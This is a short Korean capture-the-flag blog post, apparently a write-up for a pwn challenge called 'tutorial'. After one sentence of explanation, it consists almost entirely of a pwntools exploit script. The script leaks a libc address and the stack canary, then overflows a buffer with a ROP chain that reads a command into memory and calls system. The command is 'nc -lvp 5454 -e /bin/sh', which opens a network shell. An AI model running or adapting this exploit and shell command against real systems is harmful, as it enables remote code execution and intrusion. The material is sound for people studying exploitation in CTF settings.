문제를 풀기위한 제약 조건이 많아서 ida로 그 조건을 찾아서 맞춰 줘야 바이너리가 정상적으로 실행됨.


?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<span style="font-size: 12pt;">from pwn import *
 
r = remote("localhost", 9797)
libc_elf = ELF("./libc-2.19.so")
elf = ELF("./tutorial")
 
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
bss = elf.bss()
cmd = "nc -lvp 5454 -e /bin/sh\x00"
r.sendlineafter(">", "1")
r.recvuntil("Reference:")
 
libc_puts = int(r.recv(14), 16) + 1280
libc_system = libc_puts - 0x2a300
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("libc_system = {}".format(hex(libc_system)))
 
pop_rdi = libc_puts + 0x12e515
pop_rsi = libc_puts + 0xcd587
pop_rdx = libc_puts - 0x6dafe
 
r.sendlineafter(">", "2")
 
payload = "A"*311
r.sendlineafter("Time to test your exploit...", payload)
 
r.recvuntil("A\x0a")
canary = u64(r.recv(8))
log.info("canary = {}".format(hex(canary)))
 
print r.sendlineafter(">", "2")
payload = "\x90"*312
payload += p64(canary)
payload += "\x90"*8
 
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += p64(30)
payload += p64(read_plt)
 
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(libc_system)
pause()
r.sendlineafter(">", payload)
pause()
r.sendline(cmd)
</span>



'CTF' 카테고리의 다른 글

plaid 2019 can you guess me?  (0) 2019.04.15
codegate2019 aeiou  (0) 2019.02.23
TJCTF 2016 oneshot  (0) 2019.01.24
QIWICTF 2016 pwn200  (0) 2019.01.23
SEC-T CTF PingPong  (0) 2018.09.16

+ Recent posts

티스토리툴바